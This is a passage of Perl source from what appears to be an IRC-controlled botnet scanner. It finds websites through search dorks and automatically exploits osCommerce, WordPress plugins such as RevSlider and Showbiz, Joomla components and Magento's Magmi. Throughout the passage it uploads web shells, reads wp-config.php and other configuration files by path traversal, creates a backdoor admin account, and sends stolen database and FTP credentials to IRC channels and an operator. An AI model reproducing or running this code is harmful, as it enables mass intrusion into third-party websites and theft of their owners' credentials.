'form-data'); $resa->as_string; my $resa2 = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./smile.gif' => 'version.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resa2->as_string; my $resa3 = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./tongue.gif' => '.htaccess' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resa3->as_string; my $barner = &get_content($shell2); sleep(2); if ($barner =~ /PHP Version/i) { my $os = ""; if ($barner =~ m/System <\/td>(.*?)<\/td>/) {$os = $1;} &msg("$admin","$engine $shell3 $os ");sleep(1); &msg("$chan","PHP Version: $shell2 $os "); } my $cekap = &get_content($shell);&get_content($shellx); if ($cekap =~ /BArNEr/i) { &os($shell,$chan,$engine,$oscologo,$nick); } } if ($cob2 =~ /TABLE_HEADING_FILENAME/i) { my $test2 = $fm."?action=download&filename=/includes/configure.php"; my $cek2 = &get_content($test2); if ($cek2 =~ /http:\/\//) { &admin_osco($site,$chan,$engine); &osql_xpl($test2,$chan,$site,$engine); } my $aplod2 = LWP::UserAgent->new; my $res2 = $aplod2->post($fm."?action=processuploads",['file_1' => ['./mailer.gif' => 'mailer.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res2->as_string; my $resb = $aplod2->post($fm."?action=processuploads",['file_1' => ['./scam.gif' => '.images.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resb->as_string; my $cekap = &get_content($shell);&get_content($shellx); if ($cekap =~ /BArNEr/) { &os($shell,$chan,$engine,$oscologo,$nick); } } if ($cob3 =~ /TABLE_HEADING_BANNERS/i) { my $test3 = $bm."?action=download&filename=/includes/configure.php"; my $cek3 = &get_content($test3); if ($cek3 =~ /http:\/\//) { &admin_osco($site,$chan,$engine); &osql_xpl($test3,$chan,$site,$engine); } my $aplod3 = LWP::UserAgent->new; my $res3 = $aplod3->post($bm."?action=insert",['banners_image' => ['./mailer.gif' => 'mailer.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res3->as_string; my $resc = $aplod3->post($bm."?action=insert",['banners_image' => ['./scam.gif' => '.images.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resc->as_string; my $cekap = &get_content($shell);&get_content($shellx); if ($cekap =~ /BArNEr/) { &os($shell,$chan,$engine,$oscologo,$nick); } } if ($cob4 =~ /TABLE_HEADING_ADMINISTRATORS/i) { my $test4 = $pm."?action=download&filename=/includes/configure.php"; my $cek4 = &get_content($test4); if ($cek4 =~ /http:\/\//) { &admin_osco($site,$chan,$engine); &osql_xpl($test4,$chan,$site,$engine); } my $aplod4 = LWP::UserAgent->new; my $res4 = $aplod4->post($pm."?action=insert",['admin_1' => ['./mailer.gif' => 'mailer.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res4->as_string; my $resd = $aplod4->post($pm."?action=insert",['admin_1' => ['.scam.gif' => '.images.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resd->as_string; my $cekap = &get_content($shell);&get_content($shellx); if ($cekap =~ /BArNEr/) { &os($shell,$chan,$engine,$oscologo,$nick); } } } exit; } } } } sub admin_osco(){ my $site = $_[0]; my $chan = $_[1]; my $engine = $_[2]; my $browser = LWP::UserAgent->new(); my $responde = HTTP::Request->new(POST => "http://".$site."/admin/administrators.php/login.php?action=insert"); $responde->content_type("application/x-www-form-urlencoded"); $responde->content("username=magic&password=pass"); if($browser->request($responde)->as_string){ my $ch = "http://".$site."admin/administrators.php/login.php?action=new"; my $check = &get_content($ch); if ($check =~ /magic/i){ &msg("$chan","$oscologo4,1$engine0,1 ADMIN4,1 http://".$site."/admin/administrators.php/login.php USER:magic PASS:pass"); sleep(3); } } } sub osql_xpl() { my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $request = HTTP::Request->new(GET=>$url); my $browser = LWP::UserAgent->new(); $browser->timeout(15); my $response = $browser->request($request); if ($response->is_success) { my $data = $response->as_string; if ($data =~ m/DB_SERVER/g && $data =~ m/DB_SERVER_USERNAME/g && $data =~ m/DB_SERVER_PASSWORD/g && $data =~ m/DB_DATABASE/g ) { if ($data =~ m/'DIR_FS_CATALOG', '(.*)'/g) { $dbpath = $1; } if ($data =~ m/'DB_SERVER', '(.*)'/g || $data =~ m/'DB_SERVER', \"(.*)\"/g ) { if ($1 eq "localhost") { $clr = "4,1 "; } elsif ($1 eq "localhost:3306") { $clr = "0,1 "; } elsif ($1 eq "127.0.0.1") { $clr = "4,1 "; } $mysqlsrv = $clr.$1; } if ($data =~ m/'DB_SERVER_USERNAME', '(.*)'/g || $data =~ m/'DB_SERVER_USERNAME', \"(.*)\"/g ) { $dbuser = $1; } if ($data =~ m/'DB_SERVER_PASSWORD', '(.*)'/g || $data =~ m/'DB_SERVER_PASSWORD', \"(.*)\"/g ) { $dbpass = $1; } if ($data =~ m/'DB_DATABASE', '(.*)'/g || $data =~ m/'DB_DATABASE', \"(.*)\"/g ) { $db = $1; } &msg("$chan","$oscologo4,1$engine0,1 DATABASE4,1 http://$site DB_USER: $dbuser DB_PASS: $dbpass DB: $db"); sleep(5); my $SQLServ = $url; if($SQLServ =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { my $host = $2; &dbi_connect($mysqlsrv,$dbuser,$dbpass,$db,$chan,$engine,$oscologo);sleep(3); &ftp_connect($SQLServ,$host,$dbuser,$dbpass,$chan,$engine);sleep(2); &dbi_connect($host,$dbuser,$dbpass,$db,$chan,$engine,$oscologo); } } } } sub switch_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$switchlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$switchlogo4,1$engine0,1 Searching..."); } if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cxshell = "http://".$site."/wp-content/uploads/2014/09/magic.php"; my $switch = "http://".$site.$bug; my $cek = &get_content($switch);sleep(1); if ($cek =~ /No files were uploaded/i){ my $explo = $rceinjector."?url=".$site."&type=switchblade"; &get_content($explo);sleep(1); my $check = &get_content($cxshell."?shell");sleep(1); if ($check =~ /BArNEr/i){ &os($cxshell,$chan,$engine,$switchlogo,$nick); } } } exit; } } } } sub photo_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$photologo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$photologo4,1$engine0,1 Searching..."); } my $photo = "http://".$site.$bug; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cxshell = "http://".$site."/magic.php"; my $cek = &get_content($photo);sleep(1); my $explo = $rceinjector."?url=".$site."&type=photo"; &get_content($explo);sleep(1); my $check = &get_content($cxshell."?shell");sleep(1); if ($check =~/BArNEr/i){ &os($cxshell,$chan,$engine,$photologo,$nick); } } } exit; } } } } sub elemin_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$eleminlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$eleminlogo4,1$engine0,1 Searching..."); } my $elemin = "http://".$site.$bug; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cxshell = "http://".$site."/wp-content/themes/elemin/uploads/magic.php"; my $cek = &get_content($elemin);sleep(1); my $explo = $rceinjector."?url=".$site."&type=elemin"; &get_content($explo);sleep(1); my $check = &get_content($cxshell."?shell");sleep(1); if ($check =~ /BArNEr/i){ &os($cxshell,$chan,$engine,$eleminlogo,$nick); } } } exit; } } } } sub RevSlider_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$revlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$revlogo4,1$engine0,1 Searching..."); } my $test = "http://".$site."/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"; my $file = &get_content($test); my $file = &get_content($test); if ($file =~ /DB_HOST/i ) { my $serverIP =""; if ($file =~ m/'DB_NAME', '(.*)'/g) {$dbname=$1;} if ($file =~ m/'DB_USER', '(.*)'/g) {$user=$1;} if ($file =~ m/'DB_PASSWORD', '(.*)'/g) {$pass=$1;} if ($file =~ m/'DB_HOST', '(.*)'/g) {$serverIP=$1;} &msg("$chan","$revlogo4,1$engine 0,1Database[+] 4,1http://".$site." [+]hostname:".$serverIP." [+]username:".$user." [+]password:".$pass." [+]dbname:".$dbname.""); if ($user =~ /_/) {@users = split("_", $user); $usr = $users[0];} my $ceklog = "ftp://".$usr.":".$pass."@".$site.""; my $ceklog2 = "ftp://".$user.":".$pass."@".$site.""; my $ftplog = &get_content($ceklog); my $ftplog2 = &get_content($ceklog2); if ($ftplog =~ /ftp/) { &msg("$admin","4,1[+]$revlogo0,1$engine 4,1FTP[+] 0,1ftp://".$site." [+]username:".$usr." [+]password:".$pass.""); &msg("$chan","4,1[+]$revlogo0,1$engine 4,1FTP[+]Success send To Admin"); } if ($ftplog2 =~ /ftp/) { &msg("$admin","4,1[+]$revlogo0,1$engine 4,1FTP[+] 0,1ftp://".$site." [+]username:".$user." [+]password:".$pass.""); &msg("$chan","4,1[+]$revlogo0,1$engine 4,1FTP[+]Success send To Admin"); } my $hosts = "http://".$site; if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; &dbi_connect($host,$user,$pass,$dbname,$chan,$engine,$revlogo);sleep(1); &msg("$chan","!ftp ".$host." ".$user." ".$pass.""); if ($dbname =~ /_/) {@users = split("_",$dbname); $dbuser = $users[0]; } &ftp_connect($url,$host,$dbuser,$pass,$chan,$engine,$revlogo);sleep(1); &msg("$chan","!ftp ".$host." ".$dbuser." ".$pass.""); } } } } } sub RevSlider2_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$revlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$revlogo4,1$engine0,1 Searching..."); } my $test = "http://".$site."/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php"; my $file = &get_content($test); my $file = &get_content($test); if ($file =~ /DB_HOST/i ) { my $serverIP =""; if ($file =~ m/'DB_NAME', '(.*)'/g) {$dbname=$1;} if ($file =~ m/'DB_USER', '(.*)'/g) {$user=$1;} if ($file =~ m/'DB_PASSWORD', '(.*)'/g) {$pass=$1;} if ($file =~ m/'DB_HOST', '(.*)'/g) {$serverIP=$1;} &msg("$chan","$revlogo4,1$engine 0,1Database[+] 4,1http://".$site." [+]hostname:".$serverIP." [+]username:".$user." [+]password:".$pass." [+]dbname:".$dbname.""); if ($user =~ /_/) {@users = split("_", $user); $usr = $users[0];} my $ceklog = "ftp://".$usr.":".$pass."@".$site.""; my $ceklog2 = "ftp://".$user.":".$pass."@".$site.""; my $ftplog = &get_content($ceklog); my $ftplog2 = &get_content($ceklog2); if ($ftplog =~ /ftp/) { &msg("$admin","4,1[+]$revlogo0,1$engine 4,1FTP[+] 0,1ftp://".$site." [+]username:".$usr." [+]password:".$pass.""); &msg("$chan","4,1[+]$revlogo0,1$engine 4,1FTP[+]Success send To Admin"); } if ($ftplog2 =~ /ftp/) { &msg("$admin","4,1[+]$revlogo0,1$engine 4,1FTP[+] 0,1ftp://".$site." [+]username:".$user." [+]password:".$pass.""); &msg("$chan","4,1[+]$revlogo0,1$engine 4,1FTP[+]Success send To Admin"); } my $hosts = "http://".$site; if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; &dbi_connect($host,$user,$pass,$dbname,$chan,$engine,$revlogo);sleep(1); &msg("$chan","!ftp ".$host." ".$user." ".$pass.""); if ($dbname =~ /_/) {@users = split("_",$dbname); $dbuser = $users[0]; } &ftp_connect($url,$host,$dbuser,$pass,$chan,$engine,$revlogo);sleep(1); &msg("$chan","!ftp ".$host." ".$dbuser." ".$pass.""); } } } } } sub folio_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$foliologo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$foliologo4,1$engine0,1 Searching..."); } if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $btportfolioshell = "http://".$site."administrator/components/com_bt_portfolio/magic.php"; my $type = $rceinjector."?url=".$site."&type=folio"; my $cekk = &get_content($type); my $check = &get_content($btportfolioshell."?shell"); if ($check =~ /BArNEr/i){ &os($btportfolioshell,$chan,$engine,$foliologo,$nick); } } } exit; } } } } sub rci_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rcilogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$rcilogo4,1$engine0,1 Searching..."); } foreach my $jpath(@jpaths) { my $test = "http://".$site.$jpath.$jvuln."?name=magic.php"; my $test1 = "http://".$site.$jpath.$jvuln."?name=magic.php.pHp"; my $test2 = "http://".$site.$jpath.$jvuln."?name=.htaccess"; my $cek1 = &get_content($test);&get_content($test1); if ($cek1 =~ /Saving your image to/i){ &msg("$chan","$rcilogo 4,1Exploiting 0,1http://$site 4,1Loading.. "); &jg_magic($test); &jg_magic($test1); my $shell = "http://".$site.$jpath.$jshell; my $shellx = "http://".$site.$jpath.$jcpanel; my $check = &get_content($shell); my $jancok = &get_content($shellx); if ($check =~ /BArNEr/i){ &os($shell,$chan,$engine,$rcilogo,$nick); } if ($jancok =~ /BArNEr/i){ &os2($shellx,$chan,$engine,$rcilogo,$nick); } } } } } } sub up_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$uplogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$uplogo 4,1$engine Selesai"); } my $kontol = "http://".$site."/xmlrpc.php"; my $cek = &get_content($kontol); if ($cek =~ m/XML-RPC server accepts POST requests only/g) { way2($site,$chan,$engine); } } } sub way2() { my $site = $_[0]; my $chan = $_[1]; my $engine = $_[2]; $test = "http://".$site; $control = &get_content($test);sleep(7); if ($control =~ /\/wp-content\/themes\/(.*?)\//i){ $temane = $1; } my $bawere = "http://".$site."/wp-content/themes/".$temane."/includes/uploadify/upload_settings_image.php"; my $itil = get_content($bawere); if ($itil =~ /{"status":"NOK", "ERR":"This file is incorect"}/) { my $ua = LWP::UserAgent->new; $ua->timeout(30); my $response = $ua->post( $bawere, Content_Type => 'form-data', Content => [ 'Filedata' => ["$jembot"] ] ); my $body = $response->content; if($body =~ /rel=\\"(.*?)">/){ my $out = $1; $out =~ s/\\//g; my $semprot = &get_content($out); if ($semprot =~ /GIF89a/) { if ($semprot =~ /BArNEr<\/title>(.*?)<form/) {$os = $1;} &msg("$admin","4,1$engine theme: $temane 0,1 $out 4,1$os"); &msg("$chan","4,1$uplogo send to $nick theme: $temane 4,1$os"); &msg("$nick","4,1$uplogo theme: $temane $out 4,1$os"); } } } } } sub jinc_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jinclogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jinclogo4,1$engine0,1 Searching..."); } foreach my $jpath(@jpaths) { my $test = "http://".$site.$bug."?name=magic.php"; my $test1 = "http://".$site.$bug."?name=magic.php.pHp"; my $test2 = "http://".$site.$bug."?name=.htaccess"; my $cek1 = &get_content($test);&get_content($test1); if ($cek1 =~ /Saving your image to/i){ &jg_magic($test); &jg_magic($test1); my $shell = "http://".$site."administrator/components/com_jinc/classes/graphics/tmp-upload-images/magic.php"; my $shellx = "http://".$site."administrator/components/com_jinc/classes/graphics/tmp-upload-images/cpx.php"; my $check = &get_content($shell);&get_content($shellx); if ($check =~ /GIF89a/i){ &os($shell,$chan,$engine,$jinclogo,$nick); } } } } } } sub jnews_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jnewslogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jnewslogo4,1$engine0,1 Searching..."); } foreach my $jpath(@jpaths) { my $test = "http://".$site.$bug."?name=magic.php"; my $test1 = "http://".$site.$bug."?name=magic.php.pHp"; my $test2 = "http://".$site.$bug."?name=.htaccess"; my $cek1 = &get_content($test);&get_content($test1); if ($cek1 =~ /Saving your image to/i){ &jg_magic($test); &jg_nagic($test1); my $shell = "http://".$site."components/com_jnews/includes/openflashchart/tmp-upload-images/magic.php"; my $shellx = "http://".$site."components/com_jnews/includes/openflashchart/tmp-upload-images/cpx.php"; my $check = &get_content($shell);&get_content($shellx); if ($check =~ /GIF89a/i){ &os($shell,$chan,$engine,$jnewslogo,$nick); } } } } } } sub rev_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$revlogo(4,1@4,1$engine4,1)0,1 Scan finish "); } my $test = "http://".$site."wp-admin/admin-ajax.php"; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /0/ || $html =~ m/1 0/i ) { &rev_xpl($test,$chan,$site,$engine); &rev2_xpl($test,$chan,$site,$engine); } else { } } exit; sleep(2); } } } } sub rev_xpl() { my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(10); $ua->agent($useragent); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $plugin = "revslider"; my $action = "revslider_ajax_action"; my $update_file = "revslider.zip"; my $exploit = $ua->post("$url", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]); my $status = $exploit->as_string; my $check = &get_content("http://".$site."wp-content/plugins/revslider/temp/update_extract/revslider/arhy.php"); my $checkx = &get_content("http://".$site."wp-content/plugins/revslider/temp/update_extract/revslider/xxx.php"); my $checkxx = &get_content("http://".$site."wp-content/plugins/revslider/temp/update_extract/revslider/love.php"); if ($check =~ /Arhy - Shell/) { my $safe = ""; my $os = ""; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){$os=$1;} &msg("$chan","$revlogo4,1(4,1@4,1$engine4,1)0,1(0,1@0,1SHeLL0,1)4,1 The 0,1Private 4,1Gay :v) 0,1$safe 4,1$os");sleep(2); &msg("$nick","$revlogo4,1(4,1@4,1$engine4,1)0,1(0,1@0,1SHeLL0,1)4,1 http://".$site."wp-content/plugins/revslider/temp/update_extract/revslider/arhy.php 3$safe $os ");sleep(2); &msg("$admin","$revlogo4,1(4,1@4,1$engine4,1)0,1(0,1@0,1SHeLL0,1)4,1 http://".$site."wp-content/plugins/revslider/temp/update_extract/revslider/arhy.php 0,1$safe 4,1$os ");sleep(2); } } sub rev2_xpl() { my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(10); $ua->agent($useragent); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $plugin = "showbiz"; my $action = "showbiz_ajax_action"; my $update_file = "showbiz.zip"; my $exploit = $ua->post("$url", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]); my $status = $exploit->as_string; my $check = &get_content("http://".$site."wp-content/plugins/showbiz/temp/update_extract/showbiz/arhy.php"); my $checkx = &get_content("http://".$site."wp-content/plugins/showbiz/temp/update_extract/showbiz/xxx.php"); my $checkxx = &get_content("http://".$site."wp-content/plugins/showbiz/temp/update_extract/showbiz/love.php"); if ($check =~ /Arhy - Shell/) { my $safe = ""; my $os = ""; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){$os=$1;} &msg("$chan","$revlogo(4,1@4,1$engine4,1)0,1(0,1@0,1SHeLL0,1)4,1 The Private Gay :v 4,1$safe $os");sleep(2); &msg("$admin","$revlogo(4,1@4,1$engine4,1)0,1(0,1@0,1SHeLL0,1)4,1 http://".$site."wp-content/plugins/showbiz/temp/update_extract/showbiz/arhy.php 4,1$safe $os ");sleep(2); &msg("$admin2","$revlogo(4,1@4,1$engine4,1)0,1(0,1@0,1SHeLL0,1)4,1 http://".$site."wp-content/plugins/showbiz/temp/update_extract/showbiz/arhy.php 4,1$safe $os ");sleep(2); } } sub magento() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = &search_engine($chan,$bug,$dork,$engine,$mglogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$mglogo4,1(4,1@4,1$engine4,1)0,1 Scan finish for "); } my $vuln = "http://".$site."/app/etc/local.xml"; my $html = &get_content($vuln); if ($html =~ /dbname/i) { my $serverIP =""; if ($html =~ /<host><!\[\CDATA\[(.*)\]\]\><\/host>/) {$serverIP=$1;} if ($html =~ /<username><!\[CDATA\[(.*)\]\]\><\/username>/){$user=$1;} if ($html =~ /<password><!\[CDATA\[(.*)\]\]\><\/password>/){$pass=$1;} if ($html =~ /<dbname><!\[CDATA\[(.*)\]\]\><\/dbname>/){$dbname=$1;} &msg("$chan","$mglogo(4,1@0,1$engine4,1)4,1http://".$site." 0,1[+]hostname:4,1".$serverIP.""); &msg("$chan","$mglogo(4,1@0,1$engine4,1)4,1http://".$site." 0,1[+]username:4,1".$user.""); &msg("$chan","$mglogo(4,1@0,1$engine4,1)4,1http://".$site." 0,1[+]password:4,1".$pass.""); &msg("$chan","$mglogo(4,1@0,1$engine4,1)4,1http://".$site." 0,1[+]dbname :4,1".$dbname.""); if ($user =~ /_/) {@users = split("_", $user); $usr = $users[0];} my $ceklog = "ftp://".$usr.":".$pass."@".$site.""; my $ceklog2 = "ftp://".$user.":".$pass."@".$site.""; my $ftplog = &get_content($ceklog); my $ftplog2 = &get_content($ceklog2); if ($ftplog =~ /ftp/) { &msg("$admin","4,1[+]$mglogo0,1$engine 4,1FTP[+] 0,1ftp://".$site." [+]username:".$usr." [+]password:".$pass.""); &msg("$chan","4,1[+]$$mglogo4$engine 12FTP[+]Success send To Admin"); } if ($ftplog2 =~ /ftp/) { &msg("$admin","4,1[+]$$mglogo0,1$engine 4,1FTP[+] 0,1ftp://".$site." [+]username:".$user." [+]password:".$pass.""); &msg("$chan","4,1[+]$$mglogo0,1$engine 4,1FTP[+]Success send To Admin"); } my $hosts = "http://".$site; if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; &dbi_connect($host,$user,$pass,$dbname,$chan,$engine,$mglogo);sleep(1); &msg("$chan","!ftp ".$host." ".$user." ".$pass.""); if ($dbname =~ /_/) {@users = split("_",$dbname); $dbuser = $users[0]; } &ftp_connect($url,$host,$dbuser,$pass,$chan,$engine,$mglogo);sleep(1); &msg("$chan","!ftp ".$host." ".$dbuser." ".$pass.""); } } } } } sub jdl_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jdllogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jdllogo(7@2$engine15)14 Scan finish"); } my $test = "http://".$site.$bug; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $xmlrpc = "http://".$site."images/jdownloads/screenshots/4nt-crew.php.j"; my $cek = &get_content($test); sleep(3); if ($cek =~ /This form allows you to upload/i){ my $coba = $bogel."?url=".$site; &get_content($coba); sleep(3); my $check = &get_content($xmlrpc); sleep(2); if ($check =~ /4nt- Crew/i){ my $safe = ""; my $os = ""; my $uid = ""; my $ftphost = ""; my $ftpuser = ""; my $ftppass = ""; my $ftpopen = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} if ($check =~ m/\$ftp_host = '(.+?)';/i){$ftphost=$1;} if ($check =~ m/\$ftp_user = '(.+?)';/i){$ftpuser=$1;} if ($check =~ m/\$ftp_pass = '(.+?)';/i){$ftppass=$1;} if ($check =~ m/\$ftp_enable = '(.+?)';/i){$ftpopen=$1;} &msg("$chan","$jdllogo(7@2$engine15)(7@2SheLL15)3 Target Sent To $nick 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15)"); if ($nick eq $admin) { &msg("$admin","$jdllogo(7@2$engine15)(7@2SheLL15)3 $xmlrpc 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15)"); } else { &msg("$nick","$jdllogo(7@2$engine15)(7@2SheLL15)3 $xmlrpc 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15)"); &msg("$admin","$jdllogo(7@2$engine15)(7@2SheLL15)3 $xmlrpc 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15)"); } if ($ftpopen =~ /1/){ my $hozt = $site; $hozt =~ s/\///; &ftp_connect($hozt,$ftpuser,$ftppass,$chan); } } } } exit; } } } } sub magmi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = &search_engine($chan,$bug,$dork,$engine,$mag2logo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$chan","$mag2logo(4,1@4,1$engine4,1)0,1 Selesai"); } my $test = "http://".$site."magmi/web/plugin_upload.php"; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /MAGMI/ || $html =~ m/<h3>Upload New Plugins<\/h3>/i ) { &msg("$chan","$mag2logo(4,1@0,1$engine4,1)0,1(4,1@4,1Uploader0,1)4,1 ".$site." 0,1(4,1@4,1VulN0,1) ");sleep(2); &magmi_xpl($test,$chan,$site,$engine); &magmi_sql($test,$chan,$site,$engine); } else { } } exit; sleep(2); } } } } sub magmi_xpl() { my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $action = "http://".$site."magmi/web/magmi.php"; my $update_file = "arhy.zip"; my $exploit = $ua->post("$url", Content_Type => "multipart/form-data", Content => [action => "$action", plugin_package => ["$update_file"]]); my $status = $exploit->as_string; my $check = &get_content("http://".$site."magmi/plugins/arhy.php"); if ($check =~ /Arhy - Shell/) { my $safe = ""; my $os = ""; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){$os=$1;} &msg("$chan","$mag2logo(4,1@4,1$engine4,1)0,1(0,1@0,1SHeLL)4,1 $safe $os 0,1(0,1@0,1MazaCrew0,1) ");sleep(2); &msg("$admin","$mag2logo(4,1@4,1$engine4,1)0,1(0,1@0,1SHeLL0,1)4,1 http://".$site."magmi/plugins/arhy.php 0,1(0,1@4,1MazaCrew0,1) ");sleep(2); } } sub magmi_sql() { my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $html = &get_content($url); if ($html =~ /DB Name:<\/li>/i) { my $serverIP =""; if ($html =~ /host" value="(.*)" ><\/input>/) {$serverIP=$1;} if ($html =~ /user" value="(.*)" ><\/input>/){$user=$1;} if ($html =~ /password" value="(.*)" ><\/input>/){$pass=$1;} if ($html =~ /dbname" value="(.*)" ><\/input>/){$dbname=$1;} &msg("$chan","$mg2logo(4,1@0,1$engine4,1)4,1http://".$site." 0,1[+]hostname:4,1".$serverIP.""); &msg("$chan","$mg2logo(4,1@0,1$engine4,1)4,1http://".$site." 0,1[+]username:4,1".$user.""); &msg("$chan","$mg2logo(4,1@0,1$engine4,1)4,1http://".$site." 0,1[+]password:4,1".$pass.""); &msg("$chan","$mg2logo(4,1@0,1$engine4,1)4,1http://".$site." 0,1[+]dbname :4,1".$dbname.""); if ($user =~ /_/) {@users = split("_", $user); $usr = $users[0];} my $ceklog = "ftp://".$usr.":".$pass."@".$site.""; my $ceklog2 = "ftp://".$user.":".$pass."@".$site.""; my $ftplog = &get_content($ceklog); my $ftplog2 = 